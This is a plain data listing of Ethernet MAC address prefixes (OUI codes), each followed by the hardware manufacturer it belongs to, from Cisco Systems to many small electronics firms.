+0023DC Benein +0023DB saxnet gmbh +0023C9 Sichuan Tianyi Information Science & Technology Stock +0023CE Kita Denshi +0023D5 Warema Electronic Gmbh +002421 Micro-star Int'l +002414 Cisco Systems +002415 Magnetic Autocontrol GmbH +00240F Ishii Tool & Engineering +002408 Pacific Biosciences +002402 Op-Tection GmbH +0023FC Ultra Stereo Labs +0023CF Cummins-allison +0023C2 Samsung Electronics. +0023B6 Securite Communications / Honeywell +0023BC EQ-SYS GmbH +0023AA HFR +0023A9 Beijing Detianquan Electromechanical Equipment +00233C Alflex +00233B C-Matic Systems +002335 Linkflex +00232D SandForce +002328 Alcon Telecommunications +002321 Avitech International +0022F8 Pima Electronic Systems +00231F Guangda Electronic & Telecommunication Technology Development +0022E6 Intelligent Data +0022E0 Atlantic Software Technologies S.r.L. +0022DF Tamuz Monitors +0022DA Anatek +0022D3 Hub-Tech +0022CD Ared Technology +0022C4 epro GmbH +0022C9 Lenord, Bauer & GmbH +0022BF SieAmp Group of Companies +0022B9 Analogix Seminconductor +0022BA Huth Elektronik Systeme Gmbh +00239D Mapower Electronics +002392 Proteus Industries +00238D Techno Design +002388 V.T. Telematica +002383 InMage Systems +00237C Neotion +002324 G-pro Computer +002431 Uni-v +00241B iWOW Communications Pte +002422 Knapp Logistik Automation GmbH +002427 SSI Computer +002373 GridIron Systems +002367 UniControls a.s. +00236E Burster GmbH & KG +00236D ResMed +002360 Lookit Technology +00235B Gulfstream +002316 Kisan Electronics +00230F Hirsch Electronics +00230A Arburg Gmbh & KG +002309 Janam Technologies +002303 Lite-on IT +0022F2 SunPower +0022ED TSI Power +00228D GBS Laboratories +002287 Titan Wireless +002288 Sagrad +002281 Daintree Networks +00227A Telecom Design +00226B Cisco-Linksys +00225D Digicable Network India Pvt. +00225C Multimedia & Communication Technology +00216F SymCom +002169 Prologix +002156 Cisco Systems +002150 Eyeview Electronics +00214A Pixel Velocity +0021A3 Micromint +002199 Vacon Plc +002195 GWD Media Limited +002194 Ping Communication +00218F Avantgarde Acoustic Lautsprechersysteme GmbH +002188 EMC +002182 SandLinks Systems +002175 Pacific Satellite International +00222A SoundEar A/S +00221E Media Devices +002225 Thales Avionics +002218 Verivue +002212 CAI Networks +00220B National Source Coding Center +002205 WeLink Solutions +002206 Cyberdyne +0022B3 Sei +0022AC Hangzhou Siyuan Tech. +0022A7 Tyco Electronics AMP GmbH +0022A0 Delphi +00229A Lastar +002299 SeaMicro +0021FA A4SP Technologies +0021F4 INRange Systems +0021ED Telegesis +0021E7 Informatics Services +0021DB Santachi Video Technology (Shenzhen) +0021E1 Nortel Networks +0021D5 X2E GmbH +0021DA Automation Products Group +0021CE NTC-Metrotek +0021C8 Lohuis Networks +0021C2 GL Communications +0021BB Riken Keiki +0021B5 Galvanic +0021AF Radio Frequency Systems +0021B6 Triacta Power Technologies +0021A9 Mobilink Telecom +0021A8 Telephonics +00210D Samsin Innotec +002141 Radlive +002137 Bay Controls +00212D Scimolex +002133 Building B +002121 VRmagic GmbH +002126 Shenzhen Torch Equipment +002257 3com Europe +00224E SEEnergy +002247 DAC Engineering +00223D JumpGen Systems +002237 Shinhint Group +002238 Logiplus +002231 SMT&C +00222B Nucomm +001EF6 Cisco Systems +001EEA Sensor Switch +001EEF Cantronic International Limited +001EDE BYD Company Limited +001EE3 T&W Electronics (ShenZhen) +001EDD Wasko +001ED9 Mitsubishi Precision +001ED4 Doble Engineering +001ED3 Dot Technology Int'l +001ECD Kyland Technology +001EC6 Obvius Holdings +001F9D Cisco Systems +001FA2 Datron World Communications +001F91 DBS Lodging Technologies +001F96 Aprotechltd +001F90 Actiontec Electronics +001F8F Shanghai Bellmann Digital Source +001F85 Apriva ISS +001F87 Skydigital +001F86 digEcor +001F80 Lucas Holding bv +001F3E RP-Technik e.K. +001F42 Etherstack plc +001F39 Construcciones y Auxiliar de Ferrocarriles +001F2B Orange Logic +001F2C Starbridge Networks +001F26 Cisco Systems +001F1A Prominvest +001EC1 3com Europe +001EBA High Density Devices AS +001EB3 Primex Wireless +001EB4 Unifat Technology +001EA8 Datang Mobile Communications Equipment +001E9C Fidustron +001E95 Sigmalink +001E96 Sepura Plc +001E8B Infra Access Korea +001FEF Shinsei Industries +001FE8 Kurusugawa Electronics Industry +001FDC Mobile Safe Track +001FD7 Telerad SA +001FCB NIW Solutions +001F77 Heol Design +001F73 Teraview Technology +001F6D Cisco Systems +001F61 Talent Communication Networks +001F66 Planar +001F5A Beckwith Electric +001F53 Gemac Gesellschaft Fr Mikroelektronikanwendung Chemnitz mbH +001F4E ConMed Linvatec +001F54 Lorex Technology +001F47 MCS Logic +001FD2 Commtech Technology Macao Commercial Offshore +001FBF Fulhua Microelectronics Taiwan Branch +001FAC Goodmill Systems +00211A LInTech +002113 Padtec S/A +002114 Hylab Technology +00210E Orpak Systems L.T.D. +00210A byd:sign +002104 Gigaset Communications GmbH +001FFB Green Packet Bhd +001FF6 PS Audio International +001F19 Ben-ri Electronica +001F13 S.& A.S. +001F0F Select Engineered Systems +001EFD Microbit 2.0 AB +001F02 Pixelmetrix Pte +001EF0 Gigafin Networks +001D2C Wavetrend Technologies (Pty) Limited +001D27 Nac-intercom +001D18 Power Innovation GmbH +001D13 NextGTV +001D0C MobileCompia +001D06 HM Electronics +001D05 Eaton +001E62 Siemon +001E5D Holosys d.o.o. +001E56 Bally Wulff Entertainment GmbH +001E50 Battistoni Research +001E4A Cisco Systems +001D85 Call Direct Cellular Solutions +001D80 Beijing Huahuan Eletronics +001D68 Thomson Telecom Belgium +001D6F Chainzone Technology +001D76 Eyeheight +001D7B Ice Energy +001D75 Radioscape PLC +001D63 Miele & Cie. KG +001D5C Tom Communication Industrial +001D55 Zantaz +001DC8 Navionics Research, dba Scadametrics +001DC1 Audinate L +001DBB Dynamic System Electronics +001DAB SwissQual License AG +001E86 MEL +001E7F CBM of America +001E7A Cisco Systems +001E79 Cisco Systems +001E6F Magna-Power Electronics +001E70 Cobham Defence Communications +001E69 Thomson +001D56 Kramer Electronics +001D50 Spinetix SA +001D4B Grid Connect +001D46 Cisco Systems +001D3F Mitron +001D39 Moohadigital +001D3A mh acoustics +001D33 Maverick Systems +001E09 Zefatek +001E04 Hanson Research +001DF7 R. Stahl Schaltgerte Gmbh +001DF8 Webpro Vision Technology +001DF1 Intego Systems +001DEA Commtest Instruments +001DDB C-BEL +001DE5 Cisco Systems +001DA4 Hangzhou System Technology +001D9F Matt R.p.traczynscy Sp.J. +001D92 Micro-star Int'l +001D91 Digitize +001D8C La Crosse Technology +001E39 Comsys Communication +001E34 CryptoMetrics +001E2D Stim +001E26 Digifriends +001E1A Best Source Taiwan +001E14 Cisco Systems +001E0A Syba Tech Limited +001C61 Galaxy Microsystems LImited +001C55 Shenzhen Kaifa Technology +001C5A Advanced Relay +001C44 Bosch Security Systems BV +001C4B Gener8 +001C38 Bio-Rad Laboratories +001C3D WaveStorm +001C3F International Police Technologies +001C3E ECKey +001C31 Mobile XP Technology +001C2C Synapse +001CF9 Cisco Systems +001CF3 EVS Broadcast Equipment +001CF4 Media Technology Systems +001CED Environnement SA +001CE3 Optimedical Systems +001CDC Custom Computer Services +001CD0 Circleone +001BF5 Tellink Sistemas de Telecomunicacin S.L. +001BF0 Value Platforms Limited +001BE8 Ultratronik GmbH +001BE1 ViaLogy +001BDC Vencer +001BD5 Cisco Systems +001BCE Measurement Devices +001C94 LI-COR Biosciences +001C8E Alcatel-Lucent IPD +001C8D Mesa Imaging +001C88 Transystem +001C83 New Level Telecom +001C7A Perfectone Netware Company +001C7B Castlenet Technology +001C79 Cohesive Financial Technologies +001C74 Syswan Technologies +001C6D Kyohritsu Electronic Industry +001C68 Anhui Sun Create Electronics +001CC9 Kaise Electronic Technology +001CCA Shanghai Gaozhi Science & Technology Development +001CBD Ezze Mobile Tech. +001CB8 CBC +001CAD Wuhan Telecommunication Devices +001CAE WiChorus +001CA7 International Quartz Limited +001CA0 Production Resource Group +001C9B Feig Electronic Gmbh +001B69 Equaline +001B64 IsaacLandKorea +001B5D Vololink +001B56 Tehuti Networks +001B51 Vector Technology +001B45 ABB AS, Division Automation Products +001B4A W&W Communications +001B43 Beijing DG Telecommunications equipment +001B3E Curtis +001B37 Computec Oy +001B2B Cisco Systems +001BC9 FSN Display +001BC2 Integrated Control Technology Limitied +001BBC Silver Peak Systems +001BBD FMC Kongsberg Subsea AS +001BB3 Condalo GmbH +001BB8 Blueway Electronic;ltd +001BAC Curtiss Wright Controls Embedded Computing +001BB2 Intellect International NV +001BA5 MyungMin Systems +001BA0 Awox +001B99 KS System GmbH +001C1B Hyperstone GmbH +001C0F Cisco Systems +001C08 Echo360 +001C02 Pano Logic +001C01 ABB Oy Drives +001C03 Betty TV Technology AG +001B92 l-acoustics +001B8D Electronic Computer Systems +001B88 Divinet Access Technologies +001B83 Finsoft +001B7C A & R Cambridge +001B76 Ripcode +001B75 Hypermedia Systems +001B70 IRI Ubiteq +001A18 Advanced Simulation Technology +001A0A Adaptive Micro-Ware +001A05 Optibase +001A03 Angel Electronics +0019FE Shenzhen Seecomm Technology +0019F9 TDK-Lambda +0019ED Axesstel +0019F4 Convergens Oy +001A79 Telecomunication Technologies +001A99 Smarty (HZ) Information Electronics +001A9B Adec & Parter AG +001A94 Votronic GmbH +001A83 Pegasus Technologies +001A7E LN Srithai Comm +001AF1 Embedded Artists AB +001AF6 Woven Systems +001AEC Keumbee Electronics +001AE0 Mythology Tech Express +001AE5 Mvox Technologies +001AD2 Eletronica Nitron Ltda +001AD9 International Broadband Electric Communications +001ACB Autocom Products +001ACD Tidel Engineering LP +001A46 Digital Multimedia Technology +001A3A Dongahelecomm +001A3F intelbras +001A41 Inocova +001A2E Ziova Coporation +001A33 ASI Communications +001A1D PChome Online +001A24 Galaxy Telecom Technologies +0019A5 RadarFind +0019AC GSP Systems +0019B1 Arrow7 +00199E Nifty +0019A0 Nihon Data Systens +001994 Jorjin Technologies +00198F Alcatel Bell N.V. +0019E8 Cisco Systems +0019DA Welltrans O&E Technology +0019DC Enensys Technologies +0019C9 S&C Electric Company +0019CE Progressive Gaming International +0019D5 IP Innovations +0019C4 Infocrypt +0019BF Citiway technology +0019BD New Media Life +0019B8 Boundary Devices +001B26 RON-Telecom ZAO +001B1C Coherent +001B1A e-trees Japan +001B15 Voxtel +001B09 Matrix Telecom Pvt. +001B0E InoTec GmbH Organisationssysteme +001B07 Mendocino Software +001B02 EDLtd +001AFB Joby +001A74 Procare International +001A6D Cisco Systems +001A68 Weltec Enterprise +001A61 PacStar +001A54 Hip Shing Electronics +001A59 Ircona +001A4D Giga-byte Technology +001A52 Meshlinx Wireless +001AC6 Micro Control Designs +001ABC U4EA Technologies +001AC1 3Com +001AB0 Signal Networks Pvt. +001AB5 Home Network System +001AA9 Fujian Star-net Communication +00183C Encore Software Limited +001841 High Tech Computer +001843 Dawevision +001837 Universal Abit +001826 Cale Access AB +00182B Softier +001818 Cisco Systems +00181A AVerMedia Information +00181F Palmmicro Communications +001804 E-tek Digital Technology Limited +001807 Fanstel +00180C Optelian Access Networks +0017FF Playline +0017F1 Renu Electronics Pvt +0017F3 Harris Corparation +0017F8 Motech Industries +0017D4 Monsoon Multimedia +0017D9 AAI +0017E0 Cisco Systems +001920 Kume Electric +001925 Intelicis +001912 Welcat +001914 Winix +001919 Astel +00190D Ieee 1394c +001901 F1media +001906 Cisco Systems +0018F5 Shenzhen Streaming Video Technology Company Limited +0018F7 Kameleon Technologies +0018FC Altec Electronic AG +001981 Vivox +001983 CCT R&D Limited +001975 Beijing Huisen networks technology +00197C Riedel Communications GmbH +001970 Z-Com +001964 Doorking +00195F Valemount Networks +001953 Chainleader Communications +001958 Bluetooth SIG +00195A Jenaer Antriebstechnik GmbH +0018F0 Joytoto +0018E9 Numata +0018E4 Yiguang +0018DD Silicondust Engineering +0018D8 Arch Meter +0018D1 Siemens Home & Office Comm. Devices +0018D6 Swirlnet A/S +0018CC Axiohm SAS +0018C7 Real Time Automation +00186C Neonode AB +001878 Mackware GmbH +001867 Datalogic ADC +00185B Network Chemistry +001862 Seagate Technology +00184F 8 Ways Technology +001854 Argard +001856 EyeFi +001848 Vecima Networks +001945 RF COncepts +00194C Fujian Stelcom information & Technology +001940 Rackable Systems +001934 Trendon Touch Technology +001939 Gigamips +001931 Balluff GmbH +0018BB Eliwell Controls srl +0018B9 Cisco Systems +0018B4 Dawon Media +0018AD Nidec Sankyo +0018A8 AnNeal Technology +00189C Weldex +0018A1 Tiqit Computers +001897 Jess-link Products +001892 ads-tec GmbH +001890 RadioCOM, s.r.o. +001884 Fon Technology S.L. +00187F Zodianet +0016D1 ZAT a.s. +0016C3 BA Systems +0016BE Infranet +0016B7 Seoul Commtech +0016B2 DriveCam +0016B0 VK +0016AB Dansensor A/S +0016A6 Dovado FZ-LLC +0017CF iMCA-GmbH +0017C3 KTF Technologies +0017B7 Tonze Technology +0017BC Touchtunes Music +0017B5 Peerless Systems +001723 Summit Data Communications +00171C NT MicroSystems +001710 Casa Systems +001715 Qstik +001717 Leica Geosystems AG +00170B Contela +0016FF Wamin Optocomm Mfg +001774 Elesta GmbH +001779 QuickTel +00177B Azalea Networks +001764 ATMedia GmbH +001766 Accense Technology +00175F Xenolink Communications +001751 Online +001758 ThruVision +001745 Innotz +00174C Millipore +00179F Apricorn +0017A9 Sentivision +001793 Tigi +00178C Independent Witness +00178E Gunnebo Cash Automation AB +001780 Applied Biosystems +001787 Brother, Brother & Sons ApS +00176B Kiyon +00BAC0 Biometric Access Company +001673 Bury GmbH & KG +001671 Symphox Information +001665 Cellon France +00166A TPS +00165E Precision I/O +001657 Aegate +001659 Z.m.p. Radwag +001658 Fusiontech Technologies +001652 Hoatech Technologies +001646 Cisco Systems +00164B Quorion Data Systems GmbH +001740 Bluberi Gaming Technologies +001736 iiTron +00172F NeuLion Incorporated +001728 Selex Communications +00172A Proware Technology(By Unifosa) +00169A Quadrics +0016A1 3Leaf Networks +001693 PowerLink Technology +001695 AVC Technology (International) Limited +00168E Vimicro +001682 Pro Dex +001687 Chubb CSC-Vendor AP +00167B Haver&Boecker +0016F3 Cast Information +0016EE Royaldigital +0016E7 Dynamix Promotions Limited +0016E0 3Com +0016D6 TDA Tech +00151E Ethernet Powerlink Standardization Group (epsg) +001525 Chamberlain Access Solutions +001519 StoreAge Networking Technologies +001518 Shenzhen 10MOONS Technology Development +001514 Hu Zhou Nava Networks&electronics +00150E Openbrain Technologies +00150F mingjong +00150D Hoana Medical +001508 Global Target Enterprise +0014FC Extandon +001501 LexBox +0014F5 OSI Security Devices +0014E9 Nortech International +0014EE Western Digital Technologies +0014DF HI-P Tech +0014E4 infinias +0014D3 Sepsa +0014D8 bio-logic SA +0014D2 Kyuden Technosystems +0015E0 Ericsson +0015DC KT&C +0015D5 Nicevt +0015D7 Reti +0015D6 OSLiNK Sp. z o.o. +0015C4 Flovel +0015C9 Gumstix +0015BD Group 4 Technology +0015B6 ShinMaywa Industries +001581 Makus +00156B Perfisans Networks +001570 Zebra Technologies +00155D Microsoft +00155F GreenPeak Technologies +001564 Behringer Spezielle Studiotechnik Gmbh +00155E Morgan Stanley +001558 Foxconn +001551 RadioPulse +001549 Dixtal Biomedica Ind. Com. Ltda +00154C Saunders Electronics +00154A Wanshih Electronic +00153D Elim Product +001544 coM.s.a.t. AG +001531 Kocom +001538 RFID +00161D Innovative Wireless Technologies +00161C e:cue +00160C LPL Development S.A. DE C.V +001611 Altecon Srl +001612 Otsuka Electronics +001605 Yorkville Sound +0015F9 Cisco Systems +001600 CelleBrite Mobile Synchronization +0015ED Fulcrum Microsystems +0015E1 Picochip +0015E6 Mobile Technika +0015B1 Ambient +0015AC Capelon AB +0015A7 Robatech AG +001594 Bixolon +00158D Jennic +001588 Salutica Allied Solutions Sdn Bhd +0014CC Zetec +0014C0 Symstream Technology Group +0014C5 Alive Technologies +0014B9 Mstar Semiconductor +0014AF Datasym POS +0014A8 Cisco Systems +00163C Rebox +00162E Space Shuttle Hi-Tech +001629 Nivus GmbH +001622 BBH Systems Gmbh +001616 Browan Communication +00161B Micronet +00135B PanelLink Cinema +001362 ShinHeung Precision +001351 Niles Audio +001345 Eaton +00134A Engim +00133E MetaSwitch +00132B Phoenix Digital +001332 Beijing Topsec Network Security Technology +001337 Orient Power Home Network +001338 Fresenius-vial +00137A Netvox Technology +001381 Chips & Systems +001386 ABB/Totalflow +001374 Atheros Communications +00136E Techmetro +001373 BLwave Electronics +001367 Narayon. +001361 Biospace +001357 Soyal Technology +001326 ECM Systems +001325 Cortina Systems +00131B BeCell Innovations +00131C LiteTouch +001309 Ocean Broadband Networks +00130E Focusrite Audio Engineering Limited +0012FC Planet System +0012F6 MDK +0012F1 Ifotec +00143E AirLink Communications +001437 GSTeletech +001430 ViPowER +00142B Edata Communication +001424 Merry Electrics +00141F SunKwang Electronics +00141A Deicy +001413 Trebing & Himstedt Prozeautomation GmbH & KG +001415 Intec Automation +001414 Jumpnode Systems +001405 OpenIB +00140B First International Computer +0013FE Grandtec Electronic +0013F9 Cavera Systems +0013F2 Klas +0013EC Netsnapper Technologies Sarl +0013E1 Iprobe AB +0013E2 GeoVision +0013D5 RuggedCom +0013DC Ibtek +0013D0 t+ Medical +0013CB Zenitel Norway AS +0013C6 OpenGear +0013C5 Lightron Fiber-optic Devices +0013BB Smartvue +0013BF Media System Planning +0013B5 Wavesat +0013AE Radiance Technologies +0013A2 MaxStream +00139B ioIMAGE +00139C Exavera Technologies +001396 Acbel Polytech +00138A Qingdao Goertek Electronics +001389 Redes de Telefona Mvil +00149C HF Company +0014A3 Vitelec BV +001497 Zhiyuan Eletronics +001496 Phonic +001490 ASP +001489 B15402100 - Jandei +001484 Cermate Technologies +00147F Thomson Telecom Belgium +00147A Eubus GmbH +001473 Bookham +001467 ArrowSpan +001460 Kyocera Wireless +00145B SeekerNet +00145A Neratec Solutions AG +001459 Moram +001454 Symwave +001443 Consultronics Europe +00144A Taiwan Thick-Film Ind. +0011C4 Terminales de Telecomunicacion Terrestre +0011C9 MTT +0011BF Aesys +0011B8 Liebherr - Elektronik GmbH +0011AC Simtec Electronics +0011B1 BlueExpert Technology +0011B2 2001 Technology +0011A0 Vtech Engineering Canada +0011A5 Fortuna Electronic +001276 CG Power Systems Ireland Limited +00126F Rayson Technology +001270 Nges Denro Systems +00126A Optoelectronics +001263 Data Voice Technologies GmbH +00125E Caen +00125D CyberNet +001259 Thermo Electron Karlsruhe +001254 Spectra Technologies Holdings Company +001253 AudioDev AB +00129D First International Computer do Brasil +001291 KWS Computersysteme GmbH +001296 Addlogix +00128F Montilio +001282 Qovia +001289 Advance Sterilization Products +00127D MobileAria +0011F4 woori-net +0011EE Estari +0011ED 802 Global +0011E8 Tixi.Com +0011DB Land-Cellular +0011DC Glunz & Jensen +0011E1 Arcelik A.S +0011CE Ubisense Limited +0011D5 Hangzhou Sunyard System Engineering +001246 T.O.M Technology. +00124D Inducon BV +001241 a2i marketing center +00123A Posystech +001234 Camille Bauer +00122A VTech Telecommunications +00122E Signal Technology - Aisd +001233 JRC Tokki +001199 2wcom Systems GmbH +00118F Eutech Instruments PTE. +001183 Datalogic ADC +00117C e-zy.net +001176 Intellambda Systems +0012C0 HotLava Systems +0012B5 Vialta +0012BC Echolab +0012B6 Santa Barbara Infrared +0012B0 Efore Oyj (Plc) +0012A4 ThingMagic +0012A9 3Com +0012A3 Trust International +001224 NexQL +001229 BroadEasy Technologies +00121D Netfabric +001211 Protechna Herbst GmbH & KG +001218 Aruze +001205 Terrasat Communications +00120A Emerson Climate Technologies GmbH +0011FE Keiyo System Research +0011F8 Airaya +0012EC Movacolor +0012E5 Time America +0012E0 Codan Limited +0012DF Novomatic AG +0012D9 Cisco Systems +0012C6 TGC America +0012CD Asem SpA +000FE9 GW Technologies +000FDD Sordin AB +000FD6 Sarotech +002654 3Com +000FD0 Astri +000FCF DataWind Research +000FC3 PalmPalm Technology +001144 Assurance Technology +00113E JL +001131 Unatech. +001137 Aichi Electric +00112D iPulse Systems +001123 Appointech +00111D Hectrix Limited +000F6C Addi-data Gmbh +000F6B GateWare Communications GmbH +000F5F Nicety Technologies (NTS) +000F5A Peribit Networks +000F53 Solarflare Communications +000F47 Robox SPA +000F4C Elextech +001170 GSC SRL +001169 EMS Satcom +001164 Acard Technology +00115F ITX Security +00115A Ivoclar Vivadent AG +001159 Matisse Networks +001153 Trident Tek +001150 Belkin +001151 Mykotronx +00114A Kayaba Industry +001110 Maxanna Technology +001117 Cesnet +001104 Telexy +00110B Franklin Technology Systems +001100 Schneider Electric +000FFE G-pro Computer +000FEF Thales e-Transactions GmbH +000FF0 Sunray +000FF5 GN&S company +000FCA A-jin Techline +000FBD MRV Communications (Networks) +000FBE e-w/you +000FB7 Cavium +000FA4 Sprecher Automation GmbH +000FAB Kyushu Electronics Systems +000F9D DisplayLink (UK) +000F98 Avamax +000F8B Orion MultiSystems +000F8C Gigawavetech Pte +000F91 Aerotelecom +000F7E Ablerex Electronics +000F85 Addo-japan +000F72 Sandburst +000F79 Bluetooth Interest Group +000F19 Boston Scientific +000F0D Hunt Electronic +000F01 Digitalks +000EFA Optoway Technology Incorporation +000EF3 Smarthome +000EEE Muco Industrie BV +000EE7 AAC Electronics +000F38 Netstar +000F40 Optical Internetworking Forum +000F33 Duali +000F2C Uplogix +000F26 WorldAccxx +000F25 AimValley +000F13 Nisca +000F14 Mindray +000EE1 ExtremeSpeed +000EDB XiNCOM +000EE2 Custom Engineering +000ED5 Copan Systems +000EC9 Yoko Technology +000ED0 Privaris +000ED7 Cisco Systems +000EC4 Iskra Transmission d.d. +000EC3 Logic Controls +000EBD Burdick, a Quinton Compny +000EB1 Newcotech +000DAA S.A.Tehnology +000DA0 Nedap N.V. +000D9F RF Micro Devices +000D9A Infotec +000D8D Prosoft Technology +000D8E Koden Electronics +000D84 Makus +000D83 Sanmina-SCI Hungary +000D76 Hokuto Denshi +000D7D Afco Systems +000E51 tecna elettronica srl +000E4C Bermai +000E4B atrium c and i +000E3E Sun Optronics +000E45 Beijing Newtry Electronic Technology +000E39 Cisco Systems +000E32 Kontron Medical +000E2B Safari Technologies +000E2C Netcodec +000E1F TCL Networks Equipment +000E26 Gincom Technology +000E1A JPS Communications +000E19 LogicaCMG +000E13 Accu-Sort Systems +000E0F Ermme +000E05 Wireless Matrix +000E06 Team Simoco +000E0B Netac Technology +000DF8 Orga Kartensysteme Gmbh +000DFF Chenming Mold Industry +000DEC Cisco Systems +000DF3 Asmax Solutions +000DE6 Youngbo Engineering +000DE5 Samsung Thales +000DE0 Icpdas +000DD3 Samwoo Telecommunication +000DD4 Symantec +000DD9 Anton Paar GmbH +000DCD Groupe Txcom +000EAA Scalent Systems +000E9E Topfield +000EA3 Cncr-it,ltd,hangzhou P.r.china +000EA4 Certance +000E92 Open Telecom +000E97 Ultracker Technology +000E91 Navico Auckland +000E8B Astarte Technology +000E84 Cisco Systems +000D6A Redwood Technologies +000D71 boca systems +000D5E NEC Personal Products +000D63 Dent Instruments +000D64 Comag Handels AG +000D57 Fujitsu I-Network Systems Limited. +000D52 Comart system +000D51 Divr Systems +000D47 Collex +000DC1 SafeWeb +000DC6 DigiRose Technology +000DBA Oc Document Technologies GmbH +000DB4 Netasq +000DB3 SDO Communication Corperation +000DAE Samsung Heavy Industries +000DA6 Universal Switching +000E78 Amtelco +000E70 in2 Networks +000E6B Janitza electronics GmbH +000E64 Elphel +000E5D Triple Play Technologies A/S +000E5E Raisecom Technology +000BE2 Lumenera +000BE7 Comflux Technology +000BD6 Paxton Access +000BD2 Remopro Technology +000BC6 ISAC +000BCB Fagor Automation , S. Coop +000BBF Cisco Systems +000BBA Harmonic +000BB3 RiT technologies +000C38 TelcoBridges +000C3F Cogent Defence & Security Networks +000C30 Cisco Systems +000C26 Weintek Labs. +000C2E Openet information technology(shenzhen) +000C25 Allied Telesis Labs +000C1F Glimmerglass Networks +000C24 Anator +000C1B Oracom +000C19 Telio Communications GmbH +000C7A DaTARIUS Technologies GmbH +000C67 OYO Electric +000C4F UDTech Japan +000C54 Pedestal Networks +000C5B Hanwang Technology +000C60 ACM Systems +000C62 ABB AB, Cewe-Control +000C48 QoStek +000C4D Curtiss-Wright Controls Avionics & Electronics +000C14 Diagnostic Instruments +000C07 Iftest AG +000C06 Nixvue Systems Pte +000C08 Humex Technologies +000C0D Communications & Power Industries / Satcom Division +000BF5 Shanghai Sibo Telecom Technology +000BFA Exemys SRL +000C01 Abatron AG +000BEE inc.jet, Incorporated +000CE6 Meru Networks +000CEB Cnmp Networks +000CE2 Rolls-Royce +000CEC Spectracom +000CD7 Nallatech +000CDE ABB Stotz-kontakt Gmbh +000CD2 Schaffner EMV AG +000CD8 M. K. Juchheim GmbH & +000CC6 Ka-Ro electronics GmbH +000CCB Design Combus +000CC5 Nextlink +000CB3 Round +000CB8 Medion AG +000CBF Holy Stone Ent. +000A07 WebWayOne +000CA1 Sigmacom +000CA6 Mintera +000CA8 Garuda Networks +000CAD BTU International +000C95 PrimeNet +000C9A Hitech Electronics +000C8E Mentor Engineering +000C93 Xeline +000C7F synertronixx GmbH +000C82 Network Technologies +000C87 AMD +000C73 Telson Electronics +000D1D High-tek Harness ENT. +000D1E Control Techniques +000D0C MDI Security Systems +000D11 Dentsply - Gendex +000D05 cybernet manufacturing +000CF9 Xylem Water Solutions +000CFE Grand Electronic +000CF2 Gamesa Elica +000D43 DRS Tactical Systems +000D37 Wiplug +000D3E Aplux Communications +000D3D Hammerhead Systems +000D30 IceFyre Semiconductor +000D2B Racal Instruments +000D24 Sentec E&E +000D18 Mega-Trend Electronics +000BA4 Shiron Satellite Communications (1996) +000BA9 CloudShield Technologies +000BA3 Siemens AG +000B91 Aglaia Gesellschaft fr Bildverarbeitung und Kommunikation mbH +000B96 Innotrac Diagnostics Oy +000B9D TwinMOS Technologies +000B8A Miteq +000B7E Saginomiya Seisakusho +000B83 Datawatt +000AAD Stargames +000AB2 Fresnel Wireless Systems +000AB4 Etic Telecommunications +000AB9 Astera Technologies +000AA1 V V S Limited +000AA6 Hochiki +000A8E Invacom +000A9F Pannaway Technologies +000A99 Calamp Wireless Networks +000A93 W2 Networks +000A7F Teradon Industries +000A86 Lenze +000A8B Cisco Systems +000B15 Platypus Technology +000B10 11wave Technonlogy +000B09 Ifoundry Systems Singapore +000B04 Volktek +000AFD Kentec Electronics +000B02 Dallmeier electronic +000AF1 Clarity Design +000AF6 Emerson Climate Technologies Retail Solutions +000A0E Invivo Research +000A13 Honeywell Video Systems +000A04 3Com +0009FD Ubinetics Limited +0009F4 Alcon Laboratories +0009E7 ADC Techonology +0009EE Meikyo Electric +0009F3 Well Communication +0009E2 Sinbon Electronics +0009DB eSpace +000B70 Load Technology +000B72 Lawo AG +000B77 Cogent Systems +000B71 Litchfield Communications +000B5F Cisco Systems +000B64 Kieback & Peter GmbH & KG +000B5B Rincon Research +000B56 Cybernetics +000B4E VertexRSI, General Dynamics SatCOM Technologies +000B53 Initium +000A35 Xilinx +000A3A J-three International Holding +000A3C Enerpoint +000A41 Cisco Systems +000A48 Albatron Technology +000A2E Maple Networks +000A26 Ceia +000A28 Motorola +000A21 Integra Telecom +000A1A Imerge +000A15 Silicon Data +000B42 commax +000B47 Advanced Energy +000B36 Productivity Systems +000B28 Quatech +000B2F bplan GmbH +000B1C Sibco bv +000B21 G-Star Communications +000B23 Siemens Subscriber Networks +000A7A Kyoritsu Electric +000A6E Harmonic +000A73 Scientific Atlanta +000A60 Autostar Technology Pte +000A67 OngCorp +000A6C Walchem +000A5B Power-One as +000A59 HW server +000A54 Laguna Hills +000A4D Noritz +000ADF Gennum +000AD8 IPCserv Technology +000ACC Winnow Networks +000AD1 MWS +000AD3 Initech +000AC0 Fuyoh Video Industry +000AC5 Color Kinetics +00097B Cisco Systems +000982 Loewe Opta GmbH +000976 Datasoft Isdn Systems Gmbh +000969 Meret Optical Communications +000963 Dominion Lasercom +00096A Cloverleaf Communications +00096F Beijing Zhongqing Elegant Tech.,Limited +00095D Dialogue Technology +00095F Telebyte +000958 Intelnet +00094C Communication Weaver +000951 Apogee Imaging Systems +00094B FillFactory NV +0009AE Okano Electric +0009AD Hyundai Syscomm +0009B4 Kisan Telecom +0009A8 Eastmode Pte +00099B Western Telematic +00099C Naval Research Laboratory +0009A1 Telewise Communications +000995 Castle Technology +000989 VividLogic +00098E ipcas GmbH +00097C Cisco Systems +0009C8 Sinagawa Tsushin Keisou Service +0009CF iAd GmbH +0009D4 Transtech Networks +0009BB MathStar +0009C0 6wind +000807 Access Devices Limited +000801 HighSpeed Surfing +000808 PPT Vision +0007F7 Galtronics +0007FE Rigaku +0007F8 ITDevices +0007EB Cisco Systems +0007F1 TeraBurst Networks +0007E5 Coup +0007DF Vbrick Systems +0007DE eCopilt AB +0007CF Anoto AB +0007D2 Logopak Systeme GmbH & KG +0008AA Karam +0008A4 Cisco Systems +000898 Gigabit Optics +00089D UHD-Elektronik +000890 Avilinks SA +000884 Index Braille AB +000877 Liebert-Hiross Spa +08006B Accel Technologies +000871 Northdata +00087D Cisco Systems +000876 SDSystem +0008E6 Littlefeet +0008D9 Mitadenshi +0008D4 IneoQuest Technologies +0008CD With-Net +0008D3 Hercules TechnologiesS. +0008C3 Contex A/S +0008BD Tepg-us +0008BC Ilevo AB +0008B7 HIT Incorporated +0008B0 BKtel communications GmbH +00086A Securiton Gmbh +000864 Fasy +00085E PCO AG +000851 Canadian Bank Note Company +000852 Davolink +000857 Polaris Networks +00081B Windigo Systems +000822 InPro Comm +00082E Multitone Electronics PLC +00081C @pos.com +000828 Koei Engineering +000816 Bluelon ApS +000815 Cats +00091A Macat Optics & Electronics +000919 MDS Gateways +000913 SystemK +00090C Mayekawa 